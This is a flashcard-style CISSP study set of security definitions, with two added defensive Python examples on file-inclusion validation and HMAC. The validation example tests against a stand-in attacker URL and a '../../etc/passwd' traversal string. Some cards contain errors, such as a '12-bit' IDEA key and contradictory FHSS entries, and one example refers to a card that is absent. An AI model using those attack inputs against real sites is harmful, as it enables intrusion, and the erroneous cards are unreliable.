Data Encryption Standard. Standard symmetric cipher adopted in 1976 to fill the lack of a cryptographic standard. Designed by IBM, based on Lucifer (an older symmetric cipher). ***DESCRIBES THE DEA (Data Encryption Algorithm)***
Types of Integrity
Data Integrity and System Integrity
DTE
Data Terminal Equipment. Any type of network connected user machine(terminal)
Metadata
Data about data
Unconstrained Data Item (UDI)
Data that does not require integrity protection. Contrast with Constrained Data Items (CDIs), whose validity is checked by integrity verification procedures (IVPs) that ensure the data are kept in a valid state.
Remanence
Data that persists beyond noninvasive means to delete it
DBA
Database Administrators
DBMS
Database Management System
Database Shadowing
Database shadowing uses two or more identical databases
Restore/Rollback(Databases)
Databases can rollback/restore to a prior restore point
Address Space Layout Randomization
Decreases the likelihood of successful exploitation by making the memory addresses used by the system less predictable. Complicates exploit development and post-exploitation tooling, especially attacks that reuse existing code (return-to-libc, ROP), because the addresses of that code are no longer fixed. Not a guarantee: information leaks or brute force can defeat it.
DARPA
Defense Advanced Research Projects Agency
Outsiders
Defined as unauthorized attackers with no authorized privileged access to a system or organization.
Demarc
Demarcation Point. The point where the DTE and DCE meet: the ISP's responsibility ends and the customer's begins. The circuit uses a clock signal; both sides must synchronize to the clock provided by the DCE (Channel Service Unit, CSU).
DMZ
Demilitarized Zone network. Network servers receiving traffic from untrusted networks should be placed on the DMZ. Assume that any DMZ host may be compromised. A classic DMZ uses two firewalls; a single-firewall DMZ is a "three-legged" DMZ.
Denial-of-Service Attacks
Denial-of-Service attacks work by simply polluting the wireless spectrum with noise
SSH
Designed as a secure replacement for Telnet, FTP, and the UNIX "r" commands (rlogin, rsh, etc.). Provides confidentiality, integrity, and secure authentication. SFTP (SSH FTP) and SCP (Secure Copy) transfer files over SSH. SSH listens on TCP port 22.
Government clouds
Designed to keep data and resources geographically contained
Wireless Application Protocol
Designed to provide secure Web services to handheld wireless devices such as smart phones. WAP is based on HTML, and includes HDML (Handheld Device Markup Language). A WAP browser is a microbrowser, simpler than a full Web browser, and requiring fewer resources
Reformatting
Destroys the original FAT and replaces it with a new one. As with deletion, the data remains and can be recovered. Overwriting with 0s or random characters is required to destroy it.
IAB Practice 4
Destroys the integrity of computer-based information
Degaussing
Destruction of magnetic media using strong magnetic fields. Destroys the data and typically renders the media unusable.
Detection
Detection (also called identification) is the phase in which events are analyzed in order to determine whether these events might comprise a security incident
NIST SDLC Step 5
Determine Security Requirements: Determine technical features (like access controls), assurances (like background checks for system developers), or operational practices (like awareness and training).
Asymmetric Encryption
Diffie-Hellman key exchange (1976) and the RSA algorithm (1977; Rivest, Shamir, Adleman) were mathematical breakthroughs. Uses two keys: what is encrypted with one key may be decrypted with the other. Also called public key encryption because one key is publicly posted. Data encrypted with the public key cannot be decrypted with it; only the private key can. Also used for digital signatures. Asymmetric methods rely on one-way (trapdoor) functions.
DSL
Digital Subscriber Line uses existing copper pairs to provide digital service to homes and small offices. Speeds of 10 Mb/s or more. Variants: SDSL (Symmetric), ADSL (Asymmetric), VDSL (Very High Rate), and HDSL (High Data Rate).
DSSS
Direct Sequence Spread Spectrum uses the entire band at once, "spreading" the signal throughout the band.
Real Memory
Directly accessible by the CPU and is used to hold instructions
Opposing Forces to CIA
Disclosure(Confidentiality), Alteration(Integrity), Destruction(Availability)
TCSEC Division C
Discretionary Protection mean Discretionary Access Control systems(DAC) Includes class C1(Discretionary Security Protection) and C2(Controlled Access Protection).
Guidelines
Discretionary, useful pieces of advice, such as "to create a strong password."
NIST SDLC Step 16
Disposal: The secure decommission of a system.
SDLC 10
Disposition
IAB Practice 2
Disrupts the intended use of the Internet
RIP
Distance vector routing protocol. Uses hop count as its metric. Does not have a full view of the network and converges slowly.
DNP3
Distributed Network Protocol, an open standard used primarily within the energy sector. Provides interoperability between various vendors' SCADA and smart grid applications. Seen in US Department of Energy environments.
First Normal Form (1NF)
Divide data into tables.
****EXAM WARNING****
Do not confuse Service Oriented Architecture (SOA) with SOAP. Different concepts.
Need to know
Does the user "need to know" the specific data they may attempt to access? More granular than least privilege.
Ethics
Doing what is morally right. i.e Hippocratic Oath. Treat sensitive information ethically.
DNSSEC
Domain Name System Security Extensions provide authentication and integrity for DNS responses via public key cryptography (digital signatures). DNSSEC does not provide confidentiality.
Acquisitions
Due diligence requires a thorough risk assessment of any acquired company's information security program.
Object Reuse Attacks
Dumpster Diving, Recovering Info from Unallocated Blocks on a Disk Drive. Cleaning and destruction should follow a formal policy.
ITSEC/TCSEC Ratings
ITSEC to TCSEC mapping: E0 = D; F-C1,E1 = C1; F-C2,E2 = C2; F-B1,E3 = B1; F-B2,E4 = B2; F-B3,E5 = B3; F-B3,E6 = A1. Additional functionality ratings: F-IN: high integrity requirements; F-AV: high availability requirements; F-DI: high integrity requirements for networks; F-DC: high confidentiality requirements for networks; F-DX: high integrity and confidentiality requirements for networks. See: http://www.ssi.gouv.fr/site_documents/ITSEC/ITSEC-uk.pdf
E Carriers
E1s are dedicated 2.048-megabit circuits. An E3 bundles 16 E1s to form a 34.368-megabit circuit.
EAP-TTLS
EAP Tunneled Transport Layer Security; drops the client-side certificate requirement, allowing other authentication methods (such as a password) for client-side authentication inside the TLS tunnel.
EAP-FAST
EAP-Flexible Authentication via Secure Tunneling; designed by Cisco to replace LEAP. It uses a Protected Access Credential (PAC), a pre-shared key.
Types of EAP
EAP-MD5, LEAP, EAP-FAST, EAP-TLS, EAP-TTLS, and PEAP
EAP-TLS
EAP-Transport Layer Security. Uses PKI, requiring both server-side and client-side certificates. Costly to deploy.
Common Criteria: Levels of Evaluation
Each level builds on the depth of review of the preceding level. EAL1: Functionally tested. EAL2: Structurally tested. EAL3: Methodically tested and checked. EAL4: Methodically designed, tested, and reviewed. EAL5: Semi-formally designed and tested. EAL6: Semi-formally verified, designed, and tested. EAL7: Formally verified, designed, and tested.
Bus Topology
Each node inspects the data as it passes along the bus.
EMI
Electromagnetic Interference. Improperly shielded cables and circuits may suffer crosstalk from EMI. Mitigated via proper shielding and cable management.
5 Modes of DES
Electronic Code Book (ECB), Cipher Block Chaining (CBC), Cipher Feedback (CFB), Output Feedback (OFB), Counter Mode (CTR). ECB is the original mode; CBC, CFB, and OFB were added later, then CTR. See NIST Special Publication 800-38A.
EEPROM
Electrically Erasable Programmable Read-Only Memory may be "flashed," i.e. erased electrically and written to multiple times. Contrast with EPROM, which is erased with ultraviolet light.
NonInterference Model
Ensures that data at different security domains remain separate from one another.
Antivirus
Employs heuristic or statistical methods for malware detection, but the predominant means of detecting malware is still signature-based. Weak against zero-day malware.
High Availability Clusters
Employs multiple systems that are already installed, configured, and plugged in, such that if a failure causes one of the systems to fail then the other can be seamlessly leveraged to maintain the availability of the service or application being provided.
ESP
Encapsulating Security Payload provides confidentiality by encrypting packet data.
Single DES
Encrypts 64-bit blocks with a 56-bit key. Weak against brute force.
Symmetric Encryption
Encryption that uses one key to both encrypt and decrypt.
EULA
End-User License Agreements can be in paper or electronic form
Endpoint Security
Endpoints are the targets of attacks, preventive and detective capabilities on the endpoints themselves provide a layer beyond network-centric security devices.
EPROM
Erasable Programmable Read-Only Memory may be erased (with ultraviolet light) and written to multiple times.
CWE:Directory Path Traversal
Escaping from the root of a web server (such as /var/www) into the rest of the file system by referencing parent directories with "../".
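The two file-parameter flaws in this set, PHP remote file inclusion (the "file=" card above) and directory path traversal, share one root cause and one fix, shown here as an added Python example that is not code from the study set. A vulnerable resolver that mirrors an unchecked include() sits beside a hardened one that rejects URL schemes and confines the canonical path to the web root; WEB_ROOT and the sample requests are constructed, and posixpath is used so behaviour is the same on every OS.

```python
"""Added example: validating a user-supplied ``file`` parameter.

Illustrative Python written for this study set, not code from the set.
resolve_unsafe() models include($_GET['file']) with no checks;
resolve_safe() is the hardened version. WEB_ROOT is constructed.
"""
import posixpath
from urllib.parse import urlsplit

WEB_ROOT = "/var/www"   # constructed web root


def resolve_unsafe(file_param: str) -> str:
    """Vulnerable pattern: trust the parameter.

    A URL is passed straight through (the server would fetch and execute it:
    remote file inclusion) and ../ walks out of the web root (traversal).
    """
    if "://" in file_param:
        return file_param
    return posixpath.normpath(posixpath.join(WEB_ROOT, file_param))


def resolve_safe(file_param: str) -> str:
    """Hardened pattern: reject any scheme, then confine the path to WEB_ROOT."""
    # 1. A scheme (http, ftp, php, data, ...) or a protocol-relative // prefix
    #    means the parameter is trying to include remote or stream content.
    if urlsplit(file_param).scheme or file_param.startswith("//"):
        raise ValueError("remote inclusion attempt")
    # 2. Absolute paths and NUL bytes are never legitimate for a relative file.
    if file_param.startswith(("/", "\\")) or "\x00" in file_param:
        raise ValueError("absolute path or NUL byte")
    # 3. Canonicalise, then check containment against the root WITH a trailing
    #    separator so that /var/wwwevil is not accepted as inside /var/www.
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, file_param))
    root = posixpath.join(posixpath.normpath(WEB_ROOT), "")
    if not candidate.startswith(root):
        raise ValueError("path escapes web root")
    return candidate


def classify(file_param: str) -> str:
    """Label a request 'ok', 'rfi' or 'traversal' (useful for logging/alerting)."""
    try:
        resolve_safe(file_param)
        return "ok"
    except ValueError as exc:
        return "rfi" if "remote" in str(exc) else "traversal"


if __name__ == "__main__":
    for req in ("readme.txt", "http://evil.example.com/bad.php", "../../etc/passwd"):
        print(f"{req!r}: unsafe -> {resolve_unsafe(req)!r}, verdict {classify(req)}")
```

An allowlist of permitted file names is stronger still where the set of includable files is known; the containment check above is the fallback when it is not.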
Evidence Integrity
Evidence must remain reliable throughout its acquisition and analysis. Checksums prove that no data changed. One-way hashes (MD5, SHA-1) are commonly used; both are now considered weak against collisions, so record SHA-256 or stronger alongside them where possible.
Agile Software Development
Evolved as a reaction to rigid software development models. The Agile Manifesto: • Individuals and interactions over processes and tools • Working software over comprehensive documentation • Customer collaboration over contract negotiation • Responding to change over following a plan
Hierarchical Databases
Ex: the global Domain Name Service(DNS) servers form a global tree. The root name servers are the "root zone" at the base of the tree; individual DNS entries for the leaves.
***EXAM Warning***
Exam strongly prefers open over proprietary standards/protocols. CISCO's EIGRP is not open.
SSL, IPsec VPN
Examples of protocols used for encrypting data in motion.
XP
Extreme Programming ensures communication, simplicity, feedback, respect, and courage through: • Planning: specifies the desired features • Paired programming: programmers work in pairs • Forty-hour workweek • Total customer involvement • Detailed test procedures (unit tests)
False Accept Rate
FAR occurs when an unauthorized subject is accepted by the biometric system as valid. Also called a Type II error.
Broadcast MAC
FF:FF:FF:FF:FF:FF
Broadcast Address
FF:FF:FF:FF:FF:FF. Frames sent to this address reach every host on the same VLAN (broadcast domain) but not hosts on other VLANs. Inter-VLAN communication requires Layer 3 routing.
Frequency Hopping Spread Spectrum
FHSS. For sending traffic via a radio band. Minimize interference.
False Reject Rate
FRR occurs when an authorized subject is rejected by the biometric system as unauthorized. Also called a Type I error
Claude Shannon
Father of information theory; his 1949 work laid the foundations of modern cryptography (confusion and diffusion).
FIdM
Federated Identity Management applies Single Sign-On (SSO) on a much wider scale, across organizations or the Internet. May use OpenID or SAML (Security Assertion Markup Language).
Examples of Physical Access Control
Fences, Gates, Lights, Cameras, Locks, Mantraps, and Guards.
FTP
File Transfer Protocol. Has no confidentiality or integrity. Uses TCP port 21 for control and port 20 for active-mode data transfer. Many firewalls will block active FTP data connections.
Firewalls
Filter traffic between networks. TCP/IP packet filters and stateful firewalls make decisions based on Layers 3 and 4. Multihomed: multiple NICs connected to multiple different networks.
15:FIN
Finish a connection (gracefully)
Kaiser Permanente 2009
Fired/disciplined over 20 workers for violating policy (and possibly regulations such as HIPAA) by viewing Nadya Suleman's ("Octomom") medical records without a need to know.
Heat Detectors
For when temperature exceeds an established safe baseline
Forensic Media Analysis
Forensic data typically comes from binary images of secondary storage and portable storage devices such as hard disk drives, USB flash drives, CDs, DVDs, and possibly associated cellular phones and mp3 players
FHSS
Frequency Hopping Spread Spectrum for sending traffic via a radio band. Designed to maximize throughput. Uses a number of small frequency channels throughout the band
GPL
GNU General Public License. Grants: • the freedom to use the software for any purpose, • the freedom to change the software to suit your needs, • the freedom to share the software with your friends and neighbors, • the freedom to share the changes you make.
802.1X Authentication
Generally bundled with additional security functionality such as: patch verification, antivirus signatures and definitions.
GRE
Generic Routing Encapsulation, a tunneling protocol that carries other protocols inside IP. PPTP uses GRE to pass PPP via IP and uses TCP for its control channel (TCP port 1723).
Enigma
German Cipher Machine
Binary Backup Tools
Ghost (when run with specific non-default switches enabled), AccessData's FTK, Guidance Software's EnCase.
GAN
Global Area Network, a global collection of WANs
GIG
Global Information Grid is the U.S. Department of Defense (DoD) global network, one of the largest private networks in the world
Chosen/Adaptive Plaintext Attack
Goal is deriving the key. Usually launched against asymmetric cryptosystems. Round 1 mirrors the chosen plaintext attack; later chosen plaintexts are adapted based on earlier results.
Environmental Controls
HVAC and Power are crucial factors that can impact server room security if not carefully maintained.
White hat hackers
Hackers who act legally and within the bounds of the law. Also known as ethical hackers
Blackhats
Hackers who act maliciously.
RAID 2
Hamming Code. Not considered commercially viable for hard disks and is not used. Require either 14 or 39 hard disks and a specially designed hardware controller. Cost prohibitive
Shredding
Hard-copy sensitive information needs to be shredded prior to disposal. Cross-cut shredding is preferred.
Dual Homed Host
Has two network interfaces: one connected to a trusted network and the other connected to an untrusted network.
HAVAL
Hash of Variable Length is a hashing algorithm that creates message digests of 128, 160, 192, 224, or 256 bits.
HMAC
Hash-based Message Authentication Code. Combines a shared key with a hash function to provide integrity and authenticity. IPsec uses HMAC.
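What "combines a shared key with a hash" means in practice, as an added Python example that is not part of the study set: HMAC-SHA256 via the standard library, the same value rebuilt by hand from the RFC 2104 construction, constant-time verification, and the naive H(key || msg) that HMAC exists to replace. The key and messages are constructed.

```python
"""Added example: HMAC versus a naive keyed hash.

Illustrative Python written for this study set, not code from the set.
KEY and the messages are constructed values.
"""
import hashlib
import hmac

KEY = b"shared-secret-constructed"   # constructed shared key


def tag(message: bytes, key: bytes = KEY) -> bytes:
    """Authenticate a message: HMAC mixes the key into the hash computation."""
    return hmac.new(key, message, hashlib.sha256).digest()


def verify(message: bytes, received_tag: bytes, key: bytes = KEY) -> bool:
    """compare_digest runs in constant time, closing the timing side channel."""
    return hmac.compare_digest(tag(message, key), received_tag)


def naive_tag(message: bytes, key: bytes = KEY) -> bytes:
    """H(key || msg): not an HMAC; vulnerable to length extension with SHA-2."""
    return hashlib.sha256(key + message).digest()


def hmac_by_hand(message: bytes, key: bytes = KEY) -> bytes:
    """RFC 2104: H((K ^ opad) || H((K ^ ipad) || msg)) with SHA-256."""
    block = hashlib.sha256().block_size            # 64 bytes for SHA-256
    if len(key) > block:
        key = hashlib.sha256(key).digest()         # long keys are hashed first
    key = key.ljust(block, b"\x00")                # then zero-padded to a block
    ipad = bytes(b ^ 0x36 for b in key)
    opad = bytes(b ^ 0x5C for b in key)
    inner = hashlib.sha256(ipad + message).digest()
    return hashlib.sha256(opad + inner).digest()


if __name__ == "__main__":
    msg = b"SPI=0x1000 seq=42 payload"  # constructed message
    t = tag(msg)
    print("hand-rolled matches library:", hmac_by_hand(msg) == t)
    print("verifies:", verify(msg, t), " tampered:", verify(msg + b"!", t))
```

Verification must recompute the tag and compare with compare_digest rather than ==, because a byte-by-byte early-exit comparison leaks how many leading bytes an attacker has guessed correctly.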
Combination locks
Have dials that must be turned to specific numbers. Shared combinations are a security concern.
x86 CPU
Have four rings. But most use rings 0 and 3 only.
Centralized Logging
Having logs in a central repository allows for more scalable security monitoring and intrusion detection capabilities
Task
Heavy Weight Process(HWP)
Security assessments
Holistic approach to assessing the effectiveness of access control. The goal is to broadly cover many other specific tests, to ensure that all aspects of access control are considered.
HIDS
Host-based Intrusion Detection Systems process information within the host. Tripwire protects system integrity by detecting changes to critical operating system files.
HIPS
Host-based Intrusion Prevention Systems process/block/permit information within the host.
HTTPS
Hypertext Transfer Protocol Secure transfers encrypted Web-based data via SSL/TLS (TCP port 443).
HTTP
Hypertext Transfer Protocol, used to transfer unencrypted Web-based data (TCP port 80).
Two Basic Routing Protocols.
IGP: Interior Gateway Protocols EGP: Exterior Gateway Protocols.
IKE
IPsec can use a variety of algorithms (3DES and AES for confidentiality, MD5 and SHA for integrity, etc.). Internet Key Exchange negotiates the algorithm selection; the two sides of an IPsec tunnel usually use IKE to agree on algorithms and keys.
Tunnel Mode
IPsec can use either tunnel or transport mode. Tunnel mode is used by security gateways for point-to-point tunnels; ESP in tunnel mode encrypts the entire original packet, including its IP header.
IPsec vs. SSL
IPsec makes fundamental changes to IP networking and the OS while SSL does not
IPsec
IPv4 has no built-in confidentiality; higher-layer protocols such as TLS are used to provide security, or IPsec adds it at the network layer.
***Exam Warning***
ISC2 Code of Ethics is highly testable. You may be asked for the "best" ethical answer, when all answers are ethical, per the canons.
OCTAVE Phase 1
Identifies staff knowledge
OCTAVE Phase 2
Identifies vulnerabilities
Tailoring Process: 1
Identify and designate common controls in initial security control baselines
AAA
Identity and Authentication, Authorization, and Accountability
Identity
Identity is a claim that you are a specific person. "I am Person X." Identities must be unique
(IDaaS)
Identity is a required pre-condition to effectively manage confidentiality, integrity, and availability. Leverage cloud service for identity management.
SDLC 8
Implementation
NIST SDLC Step 8
Implementation: The system is tested and installed.
Countermeasures
Implemented to mitigate attacks. Multiple overlapping controls spanning multiple domains enhance and support each other.
TRIM command
Improves SSD garbage collection. TRIM is an attribute of the ATA Data Set Management command. It improves the compatibility, endurance, and performance of drives.
Stateful Firewalls
Include state table that allows the firewall to compare current packets to previous ones. Slower than packet filters but far more secure. Will deny fraudulent packets based on previous state table entries.
ISC2 Code of Ethics
Includes the Preamble, Canons, and Guidance. Preamble (introduction), Canons (mandatory), Guidance (advisory).
NIST SDLC Step 6
Incorporate Security Requirements Into Specifications: Ensure that the previously gathered information is incorporated in the project plan.
ITIL
Information Technology Infrastructure Library is a framework for providing best services in IT Service Management (ITSM). Five core guidance publications: 1. Service Strategy 2. Service Design 3. Service Transition 4. Service Operation 5. Continual Service Improvement
ITSEC
Information Technology Security Evaluation Criteria (ITSEC). First International Evaluation Model. Separates Functionality from Assurance. 2 types of Assurance: effectiveness(Q) and correctness(E)
NIST SDLC Step 17
Information: Information may be moved to another system, archived, discarded, or destroyed.
Iaas
Infrastructure as a Service
CMM
Capability Maturity Model levels: 1. Initial 2. Repeatable 3. Defined 4. Managed 5. Optimizing
SDLC 1
Initiation
NIST SDLC Step 2
Initiation: The need for a system is expressed and the purpose of the system is documented
NIST SDLC Step 9
Install/Turn-On Controls: A system often comes with security features disabled. These need to be enabled and configured.
IDE
Integrated Drive Electronics Disk Drive
ISDN
Integrated Services Digital Network. An earlier attempt to provide digital service via "copper pair". ISDN Basic Rate Interface (BRI) service provides two 64K channels. PRI (Primary Rate Interface) provides twenty-three 64K channels. Both have a 16K signaling channel. Sucked
SDLC 7
Integration and Test
Mesh topology
Interconnects network nodes to each other. Have superior availability
IGP
Interior Gateway Protocols RIP OSPF (Layer 3)
Private Sector Labels
Internal Use Only and Company Proprietary
IDEA
International Data Encryption Algorithm. Symmetric block cipher designed as an international replacement for DES. Uses 12-bit key and 64-bit block size. Patent encumbrance and slow speed are problems.
ICMP
Internet Control Message Protocol, a helper protocol that helps Layer 3
IPsec
Internet Protocol Security. A suite of protocols that provide a cryptographic layer to both IPv4 and IPv6. Provides VPNs (Virtual Private Networks). Includes two primary protocols: Authentication Header (AH) and Encapsulating Security Payload (ESP), which provide similar functions. Sometimes IPsec has ISAKMP and IKE. IPsec is overly complex. Complexity is the enemy of security.
Contract Acceptance testing
It is performed against the contract's acceptance criteria for producing custom developed software.
Purple
Japanese encryption device
Privilege Monitoring
Job functions that warrant greater scrutiny include: account creation/modification/deletion, system reboots, data backup, data restoration, source code access, audit log access, security configuration capabilities, etc.
Fire Class K
K: Cooking Media - Veggie Oil - Animal Oils - Fats/Lards
Thread
Light Weight Process(LWP)
LDAP
Lightweight Directory Access Protocol provides a common open protocol for interfacing and querying directory service information provided by network operating systems. Port 389 via TCP
Switch
Like a bridge but with more than two ports. Best practice is to connect only one device per switch port. Provides traffic isolation by associating the MAC address of each computer and server with its port. Shrinks collision domains.
Narrow Scope
Limited Knowledge of asset that is being tested.
Linear Cryptanalysis
Linear cryptanalysis is a known plaintext attack where the cryptanalyst finds large amounts of plaintext/ciphertext pairs created with the same key
/etc/shadow
Linux stores hashes for passwords here
LAN
Local Area Network is a comparatively small network, typically confined to a building or an area
Crime(Site Selection)
Local crime rates are factored into site selection
Boot Sector
Located after POST is complete
Lockpicking
Lock picking is the art of opening a lock. All key locks can be picked or bumped
Phisher
Malicious attacker who sends emails out to many people, infecting computers with malware to steal information.
System Owner
Manager responsible for the actual computers that house data. Ensures the hardware is physically secure and OSs are patched up to date.
TCSEC Division B
Mandatory Protection. Means Mandatory Access Control systems(MAC). Includes classes B1(Labeled Security Protection), B2 (Structured Protection) and B3(Security Domains). *Higher numbers are more secure.
CWE: SQL Injection
Manipulation of a back-end SQL server via a front-end web server.
Remote meeting technology
Many of these solutions are designed to tunnel through outbound SSL or TLS traffic, which can often pass via firewalls and any Web proxies
***EXAM WARNING***
Many organizations will opt for not implementing rotation of duties because of the cost associated with implementation. For the exam, be certain to appreciate that cost is always a consideration, and can trump the implementation of some controls.
Non-Disclosure Agreement(NDA)
Methods require that employees or other persons privy to business confidential information do not disclose to, or work for competitors in an unauthorized manner
MTD = RTO + WRT
Maximum Tolerable Downtime = Recovery Time Objective + Work Recovery Time
MTD
Maximum Tolerable Downtime which describes the total time a system can be inoperable before an organization is severely impacted. Also MAD, MTO, and MAO
Disk Encryption/Decryption
May occur in software or hardware. Software-based solutions may tax the computer's performance, while hardware-based solutions offload the cryptographic work onto another
MTTR
Mean Time to Repair describes how long it will take to recover a specific failed system.
Convergence
Means providing services such as industrial controls, storage, and voice via Ethernet and TCP/IP.
MAN
Metropolitan Area Network is typically confined to a city, a zip code, a campus, or office park
NIST SDLC Step 18
Media Sanitization: There are three general methods of purging media: overwriting, degaussing (for magnetic media only), and destruction.[22]
Offline Media Storage
Media Storage Facilities are necessary for disaster recovery, potential legal proceedings, or other matters. Facility should be far enough removed from primary to avoid impact.
Reference Monitor
Mediates all access between subjects and objects
Reference Monitor
Mediates all access between subjects and objects. It enforces the system's security policy. Prevents a normal user from writing to a restricted file, like the system password file. Eg: Mandatory Access Control (MAC), reference monitor prevents secret > top secret.
***EXAM WARNING***
Memorizing the specific steps of each SDLC is not required, but be sure to understand the logical (secure) flow of the SDLC process.
Memory Addressing
Memory values may be stored in CPU Registers, and General RAM. (Memory Location #YYYY, #ZZZZ)
Hashdump
Metasploit command that dumps password hashes from memory.
***EXAM WARNING***
Microsoft trust relationships fall into two categories: non-transitive and transitive. Non-transitive trusts only exist between two trust partners. Transitive trusts exist between two partners and all of their partner domains.
TCSEC Division D
Minimal Protection. This division describes TCSEC-evaluated systems that do not meet the requirements of higher divisions
MOR
Minimum Operating Requirements describe the minimum environmental and connectivity requirements in order to operate computer equipment.
RAID 1
Mirrored Set, perhaps the simplest of all RAID levels to understand. RAID 1 creates/writes an exact duplicate of all data to an additional disk.
Cisco
Multifunction device/chassis that can act as a router, switch, firewall, NIDS, etc. ***Exam will reference dedicated vs. multifunction***
Compartmented
Mode of operation where all subjects accessing the system have the necessary clearance but do not have the appropriate formal access approval nor need to know for all information in system. Objects are placed into compartments.
Microkernels
Modular kernels. A microkernel is usually smaller and has less native functionality than a typical monolithic kernel. Added functionality via Loadable Kernel Modules(LKM). Running modules in user mode(ring 3)
Fingerprints
Most widely used biometric control available today. Smartcards can carry fingerprint information. Fingerprint minutiae are the specific details of fingerprint friction ridges.
MD5
Most widely used, created by Ronald Rivest. Creates 128 bit hash value based on any input length. MD6 is newest version, published in 2008
Second Normal Form (2NF)
Move data that is partially dependent on the primary key to another table
RAT
Remote Access Trojan
MPLS
Multiprotocol Label Switching. Provides a way to forward WAN data via labels
S/MIME
Multipurpose Internet Mail Extensions. Provides a standard format for email including character sets and attachments. S/MIME leverages PKI to encrypt and authenticate MIME-encoded email. Eg: S/MIME gateway.
Users
Must follow the rules. Must comply with mandatory policies, procedures, standards, etc.
Service Set Identifier
Must know the SSID before joining a LAN
Walls and Doors
NFPA fire resistant rating shall not be less than one hour.
Normal Response Mode
NRM can transmit when given permission by the primary
Count-Down Timers
Needs to be both visible and audible
First Octet
Network
Components of Penetration Test
Network (Internet) Network (internal or DMZ) War dialing Wireless Physical (attempt to gain entrance into a facility or room)
NAC
Network Access Control: network device based solution supported by vendors including Cisco
NAP
Network Access Protection: computer operating system based solution by Microsoft.
NAT
Network Address Translation is used to translate IP addresses. Translates RFC1918 addresses as they traverse from intranet to the Internet. NAT hides the origin of a packet. Source address is the gateway
Promiscuous Network Access
Network Intrusion Detection Systems run in promiscuous mode. Normally requires super user access.
Types of Logs: Network Security Software/Hardware:
Network Security Software/Hardware: • Antivirus logs • IDS/IPS logs • Remote Access Software (such as VPN logs) • Web proxy • Vulnerability management • Authentication servers • Routers and firewalls
Types Of IDS/IPS
Network-based and host-based.
Microsoft NTFS Permissions
New Technology File System Read Write Read and Execute Modify Full Control (all encompassing)
Process States
New: process being created. Ready: process waiting to be executed by the CPU. Running: process being executed by the CPU. Blocked: waiting for I/O. Terminate: a completed process. Zombie: child process whose parent process is terminated.
FE-13
Newest substitute. Can be breathed
Social Engineering
No tech hacking. Uses Human Mind. An example of a social engineering attack combined with a client-side attack is emailing malware with a Subject line of "Category 5 Hurricane is about to hit Florida!"
Electronic Discovery
Pertains to legal counsel gaining access to pertinent electronic information during the pre-trial discovery phase of civil legal proceedings
Diskless Workstation
Normal POST, Loads TCP/IP Stack, and downloads kernel and OS using protocol like BOOTP or DHCP
Password policy compliance
Notifying users to change their passwords before they expire
Annual Rate of Occurrence(ARO)
Number of Losses per Year
OLE
Object Linking and Embedding is a way to link documents to other documents.
Java
Object Oriented Programming Language. Bytecode is platform independent and is run/interpreted on the Java Virtual Machine (JVM).
Quantitative Analysis
Objective analysis of hard numbers and assets. AV, EF, SLE are all examples of quantitative values.
Bell-LaPadula Model
Observes two rules. Simple Security Property and Security Property. Focused on maintaining the confidentiality of objects.
NISTSDLC Step 7
Obtain the System and Related Security Activities: May include developing the system's security features, monitoring the development process itself for security problems, responding to changes, and monitoring threats.
OEP
Occupant Emergency Plan provides coordinated procedures for minimizing loss of life and injury
CWE: Buffer Overflow
Occurs when a programmer does not perform bounds checking
Tailgating
Occurs when an unauthorized person follows an authorized person into a building after unlock/authenticating. Often combined with social engineering.
X.25
Older. X.25 provided a cost-effective way to transmit data over long distances in the 1970s through early 1990s
One Time Pad
One Time Key. Discarded after one use. Provably unbreakable form of crypto.
Limitation of Overwriting
One cannot tell if a drive has been securely overwritten by simply looking at it. Errors made during overwriting can lead to data exposure.
California Senate Bill 1386 (SB1386)
One of the first US state level breach notification laws. Requires organizations suffering a personal data breach to notify customers of the potential disclosure.
Simplex
One way communication
OCSP
Online Certificate Status Protocol. Replacement for CRLs, and uses a client-server model. Scales better than CRLs
Incremental
Only archive files that have changed since the last backup of any kind was performed. EX: On Monday's backup, only those files that have been changed since Sunday's backup will be marked for backup
OSPF
Open Shortest Path First is a link state routing protocol that learns the entire network topology for its "area". Sends event-driven updates.
Master Key
Opens any lock for a given security zone in a building
Circuit Level Proxies
Operate at Layer 5 (Session Layer). SOCKS is the most popular Circuit Level Proxy. TCP Port 1080. Applications need to be configured to support SOCKS.
NIST SDLC Step 12
Operation/Maintenance: The system is modified by the addition of hardware and software and by other events.
NIST SDLC Step 14
Operational Assurance: Examines whether a system is operated according to its current security requirements.
OPEX
Operational Expense. Routers and Switches OPEX is low. NIDS, NIPS, and AV are high.
OCTAVE
Operationally Critical Threat, Asset, and Vulnerability Evaluation, a risk management framework from Carnegie Mellon University. Describes a three-phase process for managing risk.
ROM Chips
PROM, EPROM, and EEPROM.
Pen Test Methodology
PRSVER Planning Reconnaissance Scanning Vulnerability Assessment Exploitation Reporting
10:URG
Packet contains urgent data
IP Fragmentation
If a packet exceeds the Maximum Transmission Unit (MTU), a router may fragment it. Fragmentation breaks a large packet into multiple smaller packets
PAP
Password Authentication Protocol. A very weak authentication protocol. Sends UN and PW in clear text.
PAP
Password Authentication Protocol. Defined by RFC 1334. A user enters a password and it is sent across the network in clear text
Cain & Abel
Password cracker application
Exposure Factor(EF)
Percentage of Asset Value Lost
PAN
Personal Area Networks have a range of 100 meters or much less. Low-power wireless technologies such as Bluetooth use PANs
Site Selection***EXAM WARNING***
Physical Safety of Personnel is a top priority
Deterrent Control Examples
Physical: "Beware of Dog" sign, light; Technical: warning banner at login; Administrative: sanction policy
Detective Control Examples
Physical: CCTV, light; Technical: IDS; Administrative: post-employment random drug tests
Preventive Control Examples
Physical: lock, mantrap; Technical: firewall; Administrative: pre-employment drug screening.
Bastion Host
Host placed on the Internet that is not protected by another device (firewall). Hardened to protect itself.
Syslog(Unencrypted)
Plaintext over UDP 514. The most widely used logging subsystem. Unreliable and connectionless UDP as a transport protocol for logs has implications for ensuring continuity of logging.
SDLC 3
Planning
Inline NIPS
Plays the role of a layer 3-7 firewall by passing or allowing traffic. NIPS provides defense in depth
PPTP
Point-to-Point Tunneling Protocol tunnels PPP via IP
Security Control
Policies, procedures, and other administrative controls. Assessing the real-world effectiveness of administrative controls. Change management. Architectural review. Penetration tests. Vulnerability assessments. Security audits.
Port Controls
Ports that may allow copying data to or from a system. Large amounts of information can be placed on a device small enough to evade perimeter contraband checks. Lock ports. EG: Directory Group Policy, Enterprise level port controls.
Collisions
The number of possible plaintexts is larger than the number of possible hashes. A collision occurs when different inputs have the same fixed-length hash.
Lessons Learned
Post-incident activity. Provide a final report on the incident, which will be delivered to management
POST
Power-On Self-Test. Performs basic tests, including verifying the integrity of the BIOS, Testing the memory, Identifying devices, other tasks.
Background checks
Pre-Employment Screening
NIST SDLC Step 1
